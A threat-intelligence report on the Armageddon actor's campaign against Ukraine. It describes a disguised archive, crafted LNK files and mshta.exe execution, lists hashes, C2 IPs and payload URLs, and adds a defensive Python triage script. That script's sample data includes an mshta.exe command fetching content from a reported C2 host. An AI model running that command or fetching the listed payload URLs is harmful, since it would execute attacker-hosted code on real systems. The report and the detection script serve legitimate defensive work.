Armageddon is more than a Grammy-nominated album
June 26, 2024, 8:27 a.m.
Description
This report details a Russia-linked threat actor, tracked as Armageddon, targeting Ukraine with several obfuscation techniques. The activity begins with a dropped compressed file disguised as a RAR archive, which fetches a remote image, most likely to track execution (the .bmp paths under 94.158.247.32 in the indicator list fit this role). The payload uses mshta.exe to fetch and execute remote content and relies on LNK files with crafted filenames. In the indicator list each host serves short paths of the form <stem>.<dd>.<dd> alongside <stem>/<word>.<ext> paths, so individual URLs are likely to rotate faster than the hosting IPs. Together these techniques point to an effort to evade detection and hamper analysis.
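The following triage script is an added example, not code from the report or its author. It matches a subset of the report's own indicators (hashes, C2 IPs, URLs copied from the list below) against constructed proxy log lines, and applies the behavioural check the description implies: mshta.exe launched with a remote URL argument. The proxy log format, the ProcessEvent fields and the sample events are assumptions made for the example.

```python
"""IOC and behavioural triage for the Armageddon report.

Added example: the log format, ProcessEvent shape and sample data are
constructed here; the indicator values are copied from the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Subset of the report's indicators (SHA-256, C2 IPs, full URLs).
IOC_SHA256 = {
    "ff6029cbbf66db06113a576533d2fdca734c4a44338625cbf58929c9ee87e26a",
    "00494102c3d9fd8ab40d8e7b3f8a1d4e30876257c18c45761922edf938970719",
}
IOC_IPS = {
    "194.180.191.72", "194.180.191.34", "194.180.191.31", "194.180.191.12",
    "194.180.191.15", "194.180.191.41", "185.225.19.69", "185.225.19.13",
    "94.158.247.32",
}
IOC_URLS = {
    "http://94.158.247.32/pr/quickly.bmp",
    "http://194.180.191.72/c/haze.pdf",
    "http://194.180.191.72/c.19.06",
    "http://185.225.19.69/gm/decency.zip",
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def url_host(url: str) -> str:
    """Host part of an http(s) URL, with any :port dropped."""
    return url.split("://", 1)[1].split("/", 1)[0].split(":", 1)[0]


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon EID 1 / EDR style); assumed shape."""
    image: str
    command_line: str
    parent_image: str = ""
    sha256: str = ""


def triage_process(ev: ProcessEvent) -> List[str]:
    """Return the reasons an event is suspicious; empty list means clean."""
    reasons: List[str] = []
    basename = ev.image.lower().replace("/", "\\").rsplit("\\", 1)[-1]
    urls = [u.rstrip(".,;)") for u in URL_RE.findall(ev.command_line)]
    # Behavioural rule from the report: mshta.exe executing remote content.
    if basename == "mshta.exe" and urls:
        reasons.append("mshta.exe launched with a remote URL argument")
    if ev.sha256.lower() in IOC_SHA256:
        reasons.append("image SHA-256 matches a reported hash")
    for u in urls:
        if u in IOC_URLS:
            reasons.append(f"command line references reported URL {u}")
        elif url_host(u) in IOC_IPS:
            reasons.append(f"command line references reported C2 host {url_host(u)}")
    return reasons


# Assumed proxy log layout: "<date> <time> <src_ip> <method> <url> <status>".
PROXY_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d{3})$")


def triage_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Flag proxy lines whose URL, or whose host, appears in the report."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        m = PROXY_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not fit the assumed layout
        ts, src, _method, url, _status = m.groups()
        url = url.rstrip(".,;")
        reason = None
        if url in IOC_URLS:
            reason = "exact URL IOC"
        elif url_host(url) in IOC_IPS:
            reason = "reported C2 IP"  # catches rotated paths on known hosts
        if reason:
            hits.append({"ts": ts, "src": src, "url": url, "reason": reason})
    return hits


# Constructed sample data for the example (not from the report).
SAMPLE_PROXY_LOG = [
    "2024-06-19 10:02:11 10.0.0.5 GET http://194.180.191.72/c/haze.pdf 200",
    "2024-06-19 10:02:12 10.0.0.5 GET http://194.180.191.72/c/other.pdf 404",
    "2024-06-19 10:03:00 10.0.0.7 GET http://example.org/index.html 200",
]
SAMPLE_EVENTS = [
    ProcessEvent(
        image="C:\\Windows\\System32\\mshta.exe",
        command_line="mshta.exe http://94.158.247.32/pr/quickly.bmp",
        parent_image="C:\\Windows\\explorer.exe",
    ),
    ProcessEvent(
        image="C:\\Windows\\System32\\mshta.exe",
        command_line="mshta.exe C:\\Users\\user\\local.hta",
    ),
]

if __name__ == "__main__":
    for hit in triage_proxy_log(SAMPLE_PROXY_LOG):
        print("PROXY", hit)
    for ev in SAMPLE_EVENTS:
        print("PROC", ev.command_line, "->", triage_process(ev) or "clean")
```

The second proxy line is flagged on the host alone even though its path is not in the report, which is the point of matching on IPs as well as full URLs; the second process event shows that mshta.exe with a local .hta argument is not flagged by the behavioural rule, so hash and parent-process context are still needed for those cases.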
Tags
Date
- Created: June 26, 2024, 8:18 a.m.
- Published: June 26, 2024, 8:18 a.m.
- Modified: June 26, 2024, 8:27 a.m.
Indicators
- ff6029cbbf66db06113a576533d2fdca734c4a44338625cbf58929c9ee87e26a
- f79b723fa88f39d5df67f2517b088a12b490673fa07d6a2b35275f7dc573172e
- ee237449f2ad354fbe15e9505a96f6682dd66ca8277e93c7424c751d6da201ff
- eb49a27fb886dab6d90cb5f68e9c753ae408ee656aa942bebe7ac5b2fc68891a
- eaec8cc4876f8e85f387cee5f1443ae48858f7b5b36be395ea0c139c1367d8de
- eb0bf4fd7f6653c7083f3e691d566cecc0049e94308f54c8d64af34a54bc78a1
- e21ac7085a3e38942016f3cb8db4d2f3ba0e7846c7ffb0cc7eb1d2bc0953d6d4
- e18cb739dbb3ab86803db71bf93d407a8bbabfa836eabc85a3133dfc126eb94b
- df7e86b3a3c577285b7d00671b93c759cf973a90f2cce0cbff1ace7247015c30
- dbf1d945dd6869885a5effcda12e81a626079fb9bb66ede8bb58c3e5539465d2
- d20ad28197210f72947f4f14e6a5dd6aafcbf4309d46e8a1bf7f18d107784b77
- ce3f4bd2a8c548165ec2a0f41d0bbd1ad5e87a2aebc026e82f15c956ba51ed3d
- cddaa6af9fa15fb2e6a8bfffab0fade552331cedac28a179ee9f49dfef37aea1
- cd05c4daf81a06e1941833734b20c1b2427e9cbf9b86c1c7fc6515f27932970b
- c901f2188065c443575a84249ce012faa735657b79e6dd5dc6697358d59fb574
- bd514e1622e557c80252bd000060e8221c651e485a43e795fce47ab60a1d8468
- bccaa77cf271e8e2c4aaf9982154e8166445c05274d3f58a8352b5daf0ffa3c9
- b0b962951434ff103d45db66096e04d468c757379081e6ef534da800ed6a6cef
- a8e291d181c01f7e25e14910b60755d0d439ab1d8616ce0e122514b3fed3dc52
- a459022936dbffe74089f1ed8160303f1fe909ff459842397d507c0b198a5ee1
- a2376a67640be242bec5c9ffe46822abab2361f7210a8d9ad6333df45e67117f
- 9e774b37b930c3f0c79311f6de448bc5602e16edfef92f4ff09645f27217cdea
- 9de40cb245c783935d8a7c809262f91f6a511baed67d758b7c48de7b3505e7b0
- 8e5f93ffef422ac9f6f19b840509aba5ae88aa39d846c1e40f04b26c4d20cf79
- 908b8f5f73ab2dfc7bf3070868d219d1b45f8e2d1f560162dddfd6ce19ed7592
- 8d660b8e4b5ad82aeeee594545d400483662630d301e832ee35627695a746f95
- 8c8a3457007f6e2d1d75715d21b0423e9c6b90fd2e62f7b4398180017e3f768f
- 8ab7601d03c890a078ac9f8763c950b24b5908cb76559110a65dc1d2e4385097
- 89feb40e4a98e3592054dbd8c4d47a9edbeb308659cf4d1ef9e3deba6f38a698
- 84bd6f3182ab398d5363fd6b8a375641e08c57318225714a618ffb6b6b10aefb
- 841585615fc9cb62b0f8410f1a4df38e7d11cc4b48c54e75dcdc051e9308257e
- 7be88e131a6e180f32aab59734be70ac57d773c5b68bd7919dd32f6f6f9b3de1
- 7ab474672b5b9a86fd1b00ab6ec5d2164ecab9cf846ebccb65202ed68d65eaf1
- 78e1b171afbae8b994792bb33a0bf41f39d596def43a6b3e1ac28d7dd27bb8ca
- 7694a7f4764b9015fe00f68cd75d06f7dae77fd64c58c9bcb83fd8196cc17d4b
- 6b78350cfdff778ae68b47980deeb8841d0a8a2488eb3cb6ce500758df66544e
- 6d2f57de35671937d6134bf4d2fdbfe6310a6b184dceecdeaa7f4583eb0ab6f6
- 602b1284193f71ab87a9b8d656bfd858f113e2f1a9d85d8331740d2c852a075b
- 5cf828715c004f42eea066b4935511ecb42a4e150235faee482b06904af83cc7
- 511eb0f06e4c528be6627d537b118bf4932f5a90adc81a3e986beea90f14fe77
- 55a49f62bdd66c6d6a84f476aa0f64a9b27376164ae1875e273ce9bec2eb7f43
- 4ade1dc7f4558df1ccc96433e5b26872ab283fcd39e4a3f070480ea62d3e9f30
- 4a98d11230dc0ab117534f78a9d626b754c0c9d7957a8d343a8f0e7a332f68ce
- 4520da04e857ac097daa03500ed553ed49ec00e6fc0f349b977a11bbe1ec0924
- 451f0b06775ab715249635fc6930db45bfa4bd343f448b33a49f4941653a7315
- 4347d7b2d8d180978f4646ccc457be2de0d0c7db84896e1bcd250d2d834a37b1
- 40f3e18c474e02c71620c611e2e3827793d7f07d26cc49396be500baa37dc872
- 406a09578b07415880b035cb8afd688465ffd28a9c7c46680987295ce50d8840
- 3b5c1f5df0d1d76ee58cf859557f03df35692f2a57d10c111ebdec9f69ac4b34
- 3afc8955057eb0bae819ead1e7f534f6e5784bbd5b6aa3a08af72e187b157c5b
- 304e8e18068a34c6aed82d0ad744f94687c08842a51e525a87d22a65db2334e5
- 268061a244d56a5347ae66364f6a1cf6ab5654d19086fae6d5607b95d8fc793c
- 21623210a29df18c000dbf3fcc5bb4885e8a03915f47b152a93a07f66eb2e90f
- 1ec58003c6b7625935976bdfdf7d4a11228a57b32ce1eeece68a1ab48536bbc0
- 1915bb1784b164307af70a70e3264cfe3bc3c82c43e49da59c0c592d4d29af43
- 15ce500029cae11a5b07ed654faa371ef0bb0eb9add630a1e03c58606ea35eb9
- 1543723a1dcc8f5638cd43c5882f132b554c248b334473098fc49ae007e8ee4e
- 0c0534d036dcf5cc5152b2dcb03e837b5bf8c66481d283bd637373cd49b66f7f
- 062c25a86461f7f8d392e93bd97836773a889adbdbac9d2ce11e65860a4f2af2
- 00494102c3d9fd8ab40d8e7b3f8a1d4e30876257c18c45761922edf938970719
- 194.180.191.72
- 194.180.191.34
- 194.180.191.31
- 194.180.191.12
- 185.225.19.69
- 185.225.19.13
- 94.158.247.32
- 194.180.191.15
- 194.180.191.41
- http://94.158.247.32/sb.15.04
- http://94.158.247.32/pr/quickly.bmp
- http://94.158.247.32/pr.11.04
- http://94.158.247.32/odd/selected.bmp
- http://94.158.247.32/mou/reign.bmp
- http://94.158.247.32/odd.15.04
- http://94.158.247.32/mou.15.04
- http://94.158.247.32/moh.17.04
- http://94.158.247.32/fes.17.04
- http://194.180.191.72/c/haze.pdf
- http://194.180.191.72/c.19.06
- http://194.180.191.41/omr/deal.pdf
- http://194.180.191.41/omr/bananas.pdf
- http://194.180.191.41/omr.11.06
- http://194.180.191.34/sukr.19.04
- http://194.180.191.34/sukr/regard.tmp
- http://194.180.191.34/siz/bandage.tmp
- http://194.180.191.34/siz.19.04
- http://194.180.191.34/prob.18.04
- http://194.180.191.34/gps.19.04
- http://194.180.191.34/pr.18.04
- http://194.180.191.31/zaliz/regions.tmp
- http://194.180.191.31/zaliz.23.04
- http://194.180.191.31/odes/relief.tmp
- http://194.180.191.31/odes.24.04
- http://194.180.191.15/ods/predator.zip
- http://194.180.191.15/ods.06.06
- http://194.180.191.12/od/barren.7z
- http://194.180.191.12/od.04.06
- http://185.225.19.69/gm/decency.zip
- http://185.225.19.69/gm.03.05
- http://185.225.19.13/c/intention.pdf
- http://185.225.19.13/c.18.06
Additional Information
- Ukraine